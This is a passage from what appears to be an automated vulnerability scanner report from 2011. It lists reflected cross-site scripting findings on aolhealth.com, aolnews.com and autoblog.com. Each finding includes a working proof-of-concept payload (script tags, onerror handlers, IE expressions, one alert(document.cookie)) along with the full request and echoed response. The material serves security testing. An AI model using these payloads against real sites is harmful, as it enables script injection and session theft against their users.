...[SNIP]...

1.234. http://www.aolhealth.com/traffic/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolhealth.com
Path:   /traffic/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16acd"><script>alert(1)</script>eb6bf6a9a5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /traffic16acd"><script>alert(1)</script>eb6bf6a9a5f/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Fefb95%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E2a680ac5448%3D1%2F&cb=1412981861 HTTP/1.1
Host: www.aolhealth.com
Proxy-Connection: keep-alive
Referer: http://www.aolhealth.com/?efb95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2a680ac5448=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b8c6d74611ee49286741aa7af24e81b; s_pers=%20s_getnr%3D1297023979342-New%7C1360095979342%3B%20s_nrgvo%3DNew%7C1360095979389%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:25:43 GMT
Server: Apache/2.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 43221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.aolhealth.com/traffic16acd"><script>alert(1)</script>eb6bf6a9a5f/?t=js&bv=&os=&tz=&lg=&rv=&rsv=&pw=%2F%3Fefb95%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E2a680ac5448%3D1%2F&cb=1412981861">
...[SNIP]...

1.235. http://www.aolnews.com/story/egypt-regime-offers-new-concessions-to/1550027 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /story/egypt-regime-offers-new-concessions-to/1550027

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d1d4"><img%20src%3da%20onerror%3dalert(1)>2fa0f835869 was submitted in the REST URL parameter 2. This input was echoed as 1d1d4"><img src=a onerror=alert(1)>2fa0f835869 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /story/egypt-regime-offers-new-concessions-to1d1d4"><img%20src%3da%20onerror%3dalert(1)>2fa0f835869/1550027 HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:16 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 69413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
<meta property="og:url" content="http://www.aolnews.com/story/egypt-regime-offers-new-concessions-to1d1d4"><img src=a onerror=alert(1)>2fa0f835869/1550027" />
...[SNIP]...

1.236. http://www.aolnews.com/story/egypt-regime-offers-new-concessions-to/1550027 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aolnews.com
Path:   /story/egypt-regime-offers-new-concessions-to/1550027

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7180"%3bd6f4da479f4 was submitted in the REST URL parameter 2. This input was echoed as e7180";d6f4da479f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/egypt-regime-offers-new-concessions-toe7180"%3bd6f4da479f4/1550027 HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:17 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 69200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
";
s_265.linkInternalFilters="javascript:,aolnews.com";
s_265.mmxgo = true;
s_265.prop1="story";
s_265.prop2="article";
s_265.prop12="http://www.aolnews.com/story/egypt-regime-offers-new-concessions-toe7180";d6f4da479f4/1550027";
s_265.prop23="AP";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.237. http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-king/1567480 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aolnews.com
Path:   /story/the-rise-and-fall-of-a-foreclosure-king/1567480

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aba1d"%3bf4c36a25637 was submitted in the REST URL parameter 2. This input was echoed as aba1d";f4c36a25637 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/the-rise-and-fall-of-a-foreclosure-kingaba1d"%3bf4c36a25637/1567480 HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:06 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999869
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 71809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
;
s_265.linkInternalFilters="javascript:,aolnews.com";
s_265.mmxgo = true;
s_265.prop1="story";
s_265.prop2="article";
s_265.prop12="http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-kingaba1d";f4c36a25637/1567480";
s_265.prop23="AP";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.238. http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-king/1567480 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /story/the-rise-and-fall-of-a-foreclosure-king/1567480

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c010a"><img%20src%3da%20onerror%3dalert(1)>4971c98bf8c was submitted in the REST URL parameter 2. This input was echoed as c010a"><img src=a onerror=alert(1)>4971c98bf8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /story/the-rise-and-fall-of-a-foreclosure-kingc010a"><img%20src%3da%20onerror%3dalert(1)>4971c98bf8c/1567480 HTTP/1.1
Host: www.aolnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:06 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 72020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
<meta property="og:url" content="http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-kingc010a"><img src=a onerror=alert(1)>4971c98bf8c/1567480" />
...[SNIP]...

1.239. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcaf5"><script>alert(1)</script>04f9219082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fcaf5"><script>alert(1)</script>04f9219082=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:01 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999993
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 104531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.autoblog.com/?fcaf5"><script>alert(1)</script>04f9219082=1"/>
...[SNIP]...

1.240. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6c46"-alert(1)-"8a56f02ab0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b6c46"-alert(1)-"8a56f02ab0f=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:01 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 104460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
5.channel="wb.autoblog";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Home";
s_265.prop12="http://www.autoblog.com/?b6c46"-alert(1)-"8a56f02ab0f=1";
s_265.prop16="Autoblog &mdash; We Obsessively Cover The Auto Industry";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="8";
s_265.prop23="";


...[SNIP]...

1.241. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df24d"><img%20src%3da%20onerror%3dalert(1)>1e853498656 was submitted in the REST URL parameter 3. This input was echoed as df24d"><img src=a onerror=alert(1)>1e853498656 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /2011/02/06df24d"><img%20src%3da%20onerror%3dalert(1)>1e853498656/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:17:46 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:17:49 GMT; path=/
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 117703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="referer" value="http://www.autoblog.com:1080/2011/02/06df24d"><img src=a onerror=alert(1)>1e853498656/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/">
...[SNIP]...

1.242. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65d60"><script>alert(1)</script>1b28de94597 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?65d60"><script>alert(1)</script>1b28de94597=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:16 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:16:18 GMT; path=/
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 117773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?65d60"><script>alert(1)</script>1b28de94597=1"/>
...[SNIP]...

1.243. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ed8f"-alert(1)-"d7b205f65a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?2ed8f"-alert(1)-"d7b205f65a=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:30 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:16:32 GMT; path=/
Keep-Alive: timeout=5, max=999998
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 118067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
ascript:,autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Post";
s_265.prop12="http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?2ed8f"-alert(1)-"d7b205f65a=1";
s_265.prop16="Chevy Camaro platform underpins new GM vehicle in Chicago &mdash; Autoblog";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="8";
...[SNIP]...

1.244. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.autoblog.com
Path:   /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc04"><a>1436766e6d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /2011/02/06acc04"><a>1436766e6d8/mahindra-tr40-pickup-only-good-for-19-21-mpg/ HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:17:35 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:17:38 GMT; path=/
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 118236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.autoblog.com/2011/02/06acc04"><a>1436766e6d8/mahindra-tr40-pickup-only-good-for-19-21-mpg/"/>
...[SNIP]...

1.245. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d613"-alert(1)-"fe97bb80e97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?5d613"-alert(1)-"fe97bb80e97=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:30 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:16:33 GMT; path=/
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 118757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
ternalFilters="javascript:,autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Post";
s_265.prop12="http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?5d613"-alert(1)-"fe97bb80e97=1";
s_265.prop16="Mahindra TR40 pickup only good for 19/21 mpg? &mdash; Autoblog";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="8";
s_265.prop2
...[SNIP]...

1.246. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3db4"><script>alert(1)</script>c2ac64e6519 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?b3db4"><script>alert(1)</script>c2ac64e6519=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:16 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:16:18 GMT; path=/
Keep-Alive: timeout=5, max=999985
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 118348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?b3db4"><script>alert(1)</script>c2ac64e6519=1"/>
...[SNIP]...

1.247. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7b24"><x%20style%3dx%3aexpression(alert(1))>ee21d362895 was submitted in the REST URL parameter 3. This input was echoed as f7b24"><x style=x:expression(alert(1))>ee21d362895 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /2011/02/06f7b24"><x%20style%3dx%3aexpression(alert(1))>ee21d362895/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:17:46 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:17:47 GMT; path=/
Keep-Alive: timeout=5, max=999987
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 97078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="referer" value="http://www.autoblog.com:1080/2011/02/06f7b24"><x style=x:expression(alert(1))>ee21d362895/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/">
...[SNIP]...

1.248. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44a06"-alert(1)-"c678d512fbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?44a06"-alert(1)-"c678d512fbe=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:30 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:16:32 GMT; path=/
Keep-Alive: timeout=5, max=999997
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 97405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
lters="javascript:,autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Post";
s_265.prop12="http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?44a06"-alert(1)-"c678d512fbe=1";
s_265.prop16="Williams FW33 Formula 1 car unveiled, IPO confirmed &mdash; Autoblog";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="8";
s_265
...[SNIP]...

1.249. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autoblog.com
Path:   /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b9ee"><script>alert(1)</script>325abb71f59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?5b9ee"><script>alert(1)</script>325abb71f59=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:16 GMT
Server: Apache/2.2
Cache-Control: max-age=60
